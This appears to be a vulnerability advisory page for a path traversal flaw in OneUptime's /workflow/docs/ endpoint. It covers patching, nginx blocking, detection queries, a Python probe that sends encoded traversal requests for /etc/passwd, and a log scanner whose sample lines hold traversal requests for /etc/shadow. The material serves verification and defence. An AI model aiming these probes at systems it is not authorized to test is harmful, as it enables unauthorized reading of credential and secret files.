CVE-2026-30958
📋 TL;DR
CVE-2026-30958 is an unauthenticated path traversal vulnerability in OneUptime's workflow documentation endpoint (/workflow/docs/) that lets an attacker read any file the OneUptime process can access. OneUptime versions before 10.0.21 are affected. The root cause is that a user-controlled path component is concatenated into a filesystem path without being canonicalized or confined to the documentation directory.
💻 Affected Systems
- OneUptime
⚠️ Manual Verification Required
The NVD entry for this CVE carries no version ranges, so automated scanners that key off NVD data cannot tell whether a given instance is affected.
Why? The vendor/NVD record lists the product but not the affected versions. Use the vendor advisory instead: it names 10.0.21 as the fixed release, so treat any earlier version as vulnerable.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Update to 10.0.21 or later; if that is not immediately possible, apply the workarounds below
⚠️ Risk & Real-World Impact
Worst Case
Disclosure of any file readable by the OneUptime service account: configuration and environment files holding database credentials, API keys, TLS or SSH private keys, and application source. Credentials harvested this way can be reused to pivot to the database and other connected services, turning a read-only bug into full compromise.
Likely Case
Unauthorized access to sensitive server files containing configuration data, credentials, or application secrets.
If Mitigated
Limited to the files the service account can read and to whoever can reach the endpoint: running OneUptime as an unprivileged user, keeping secrets out of world-readable files, and restricting network access to the instance all shrink the blast radius.
🎯 Exploit Status
Exploitation requires no authentication: a single crafted HTTP request with ../ (or percent-encoded) sequences in the path is sufficient, so the bar for opportunistic scanning is low.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.0.21
Vendor Advisory: https://github.com/OneUptime/oneuptime/security/advisories/GHSA-p2wh-9pw8-hvff
Restart Required: Yes
Instructions:
1. Back up your OneUptime instance (database and configuration).
2. Update to version 10.0.21 or later using your deployment method (Docker, Kubernetes, etc.).
3. Restart the application.
4. Verify the update was successful (check the reported version and re-run the traversal test from the How to Verify section).
🔧 Temporary Workarounds
Block vulnerable endpoint
Use a web application firewall or reverse proxy to block access to the /workflow/docs/ endpoint. This also removes the workflow documentation feature for legitimate users until you patch.
# Example nginx location block
location ~ ^/workflow/docs/ { deny all; }
nginx matches locations against the normalized, percent-decoded URI, so confirm the block holds by sending the same raw and encoded traversal probes you would use to test for the vulnerability.
Disable workflow feature
Disable the workflow component if it is not required; consult your deployment's configuration for the setting that turns the workflow service off.
# Set the environment variable or configuration option that disables the workflow feature (deployment-specific)
🧯 If You Can't Patch
- Implement strict network access controls to limit who can access the OneUptime instance
- Apply strict file system permissions to limit what files the application user can read
🔍 How to Verify
Check if Vulnerable:
Confirm that your OneUptime version is below 10.0.21. Then, against an instance you are authorized to test, request /workflow/docs/ with a traversal sequence such as ../../../etc/passwd. A 200 response whose body contains passwd-format lines (root:x:0:0:...) confirms the flaw. Also try percent-encoded forms (%2e%2e/, ..%2f, and double-encoded %252e%252e%252f), because a reverse proxy in front of the application may normalize the raw form before it reaches the vulnerable code.
Check Version:
Check the OneUptime dashboard or application logs for version information, or the image tag in your Docker or Kubernetes manifests.
Verify Fix Applied:
After updating to 10.0.21 or later, repeat the traversal requests (raw and percent-encoded) against /workflow/docs/ and confirm they are rejected with an error status rather than answered with file contents.
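The probe described above, as an added example for this page rather than OneUptime's own tooling. It assumes the vulnerable endpoint takes the document name as a path segment under /workflow/docs/ (the page does not show the exact request shape), that the service user can read /etc/passwd, and that the target hostname is a placeholder you replace. The fetch function is injectable so the classification logic can be exercised offline; run it only against instances you are authorized to test.

```python
"""Probe /workflow/docs/ for path traversal (CVE-2026-30958).

Added example, not OneUptime code. Assumes the endpoint shape
/workflow/docs/<name> and that /etc/passwd is readable by the service user.
"""
import sys
import urllib.error
import urllib.request

ENDPOINT = "/workflow/docs/"   # endpoint named in the advisory
TARGET = "etc/passwd"          # world-readable on Linux hosts

# Traversal spellings: raw, encoded slash, encoded dots, double-encoded.
# A proxy may normalize some of these before the app sees them, so try all.
TRAVERSALS = [
    "../" * 6,
    "..%2f" * 6,
    "%2e%2e/" * 6,
    "%252e%252e%252f" * 6,
]


def build_probe_urls(base_url: str) -> list[str]:
    """Return one probe URL per traversal spelling."""
    base = base_url.rstrip("/")
    return [f"{base}{ENDPOINT}{t}{TARGET}" for t in TRAVERSALS]


def looks_like_passwd(body: str) -> bool:
    """True if the body contains a root entry in passwd(5) format."""
    return any(
        line.startswith("root:") and line.count(":") >= 6
        for line in body.splitlines()
    )


def classify(status: int, body: str) -> str:
    """Map one response to vulnerable / rejected / inconclusive."""
    if status == 200 and looks_like_passwd(body):
        return "vulnerable"
    if status in (400, 403, 404):
        return "rejected"
    return "inconclusive"   # e.g. 200 with the docs index, 500, redirect


def default_fetch(url: str, timeout: float = 10.0) -> tuple[int, str]:
    """GET the URL as-is (urllib does not collapse '..') and return (status, body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2026-30958-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read(65536).decode("utf-8", "replace")


def probe(base_url: str, fetch=default_fetch) -> dict[str, str]:
    """Probe every spelling; fetch is injectable so the logic can be tested offline."""
    return {url: classify(*fetch(url)) for url in build_probe_urls(base_url)}


if __name__ == "__main__":
    # Hypothetical placeholder host; pass your own base URL as argv[1].
    target = sys.argv[1] if len(sys.argv) > 1 else "https://oneuptime.example.internal"
    verdicts = probe(target)
    for url, verdict in verdicts.items():
        print(f"{verdict:13} {url}")
    sys.exit(1 if "vulnerable" in verdicts.values() else 0)
```

A "vulnerable" verdict on any spelling means the fix is not in place (or a proxy is not normalizing that form); "rejected" on all four after upgrading to 10.0.21+ is the expected result. "inconclusive" usually means the endpoint answered with its normal docs page, which is worth a manual look but is not proof either way.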
📡 Detection & Monitoring
Log Indicators:
- Requests to /workflow/docs/ whose path contains traversal patterns; a 200 response to such a request indicates likely disclosure, while a burst of 4xx responses indicates probing
- Unusual file access by the application process (reads of /etc/passwd or of files outside the documentation directory), if file-access auditing such as auditd is enabled
Network Indicators:
- HTTP requests with ../ sequences in the URL path, including percent-encoded (%2e%2e%2f) and double-encoded (%252e%252e%252f) forms that evade naive string matching
- Requests to /workflow/docs/ endpoint from unexpected sources
SIEM Query:
source="web_access_logs" AND url_path="/workflow/docs/*" AND (url_path="*../*" OR url_path="*..\\*" OR url_path="*%2e%2e*" OR url_path="*%2E%2E*" OR url_path="*%252e%252e*")
The encoded variants matter because a proxy or the application may see the decoded path while the access log records the raw one; if your log pipeline URL-decodes paths before indexing, the first two patterns suffice.
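The log-based detection above, worked through as an added example that is not part of the original page or of OneUptime. It assumes nginx/Apache combined log format; the sample lines are constructed, not real traffic. Unlike the plain string match, it percent-decodes until the path stops changing (so double encoding is caught), folds backslashes, and only flags a request when an actual ".." segment appears under /workflow/docs/, which avoids false positives on filenames that merely contain dots.

```python
"""Scan web access logs for traversal attempts against /workflow/docs/.

Added example for this page, not OneUptime tooling. Assumes combined log
format; SAMPLE_LOG below is constructed for illustration.
"""
import re
import urllib.parse

# Constructed sample: one legitimate docs request, three traversal attempts in
# different encodings, one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2026:10:01:02 +0000] "GET /workflow/docs/getting-started HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2026:10:01:09 +0000] "GET /workflow/docs/../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.5.0"
203.0.113.7 - - [12/Mar/2026:10:01:11 +0000] "GET /workflow/docs/%2e%2e/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 404 162 "-" "curl/8.5.0"
203.0.113.7 - - [12/Mar/2026:10:01:14 +0000] "GET /workflow/docs/%252e%252e%252f%252e%252e%252fetc/hosts HTTP/1.1" 200 220 "-" "python-requests/2.31"
198.51.100.2 - - [12/Mar/2026:10:02:00 +0000] "GET /api/status HTTP/1.1" 200 35 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD path PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)

WATCHED_PREFIX = "/workflow/docs/"


def decode_path(raw: str, rounds: int = 3) -> str:
    """Percent-decode until stable (catches double encoding) and fold backslashes."""
    path = raw
    for _ in range(rounds):
        decoded = urllib.parse.unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def has_dot_dot_segment(path: str) -> bool:
    """True if any path segment (query string excluded) is exactly '..'."""
    return ".." in path.split("?", 1)[0].split("/")


def scan(lines) -> list[dict]:
    """Return one finding per traversal attempt under the watched prefix."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = decode_path(m.group("path"))
        if not path.startswith(WATCHED_PREFIX) or not has_dot_dot_segment(path):
            continue
        status = int(m.group("status"))
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "raw_path": m.group("path"),
            "decoded_path": path,
            "status": status,
            # A 200 means the server returned something for the traversal;
            # treat it as likely disclosure rather than a mere attempt.
            "severity": "high" if status == 200 else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['severity']:6} {f['ip']:15} {f['status']} {f['raw_path']}")
```

On the constructed sample this yields three findings from 203.0.113.7: two rated high (the raw and double-encoded requests that got a 200) and one medium (the encoded /etc/shadow request that got a 404). Feed it real log lines via scan(open(path)) and alert on any high finding.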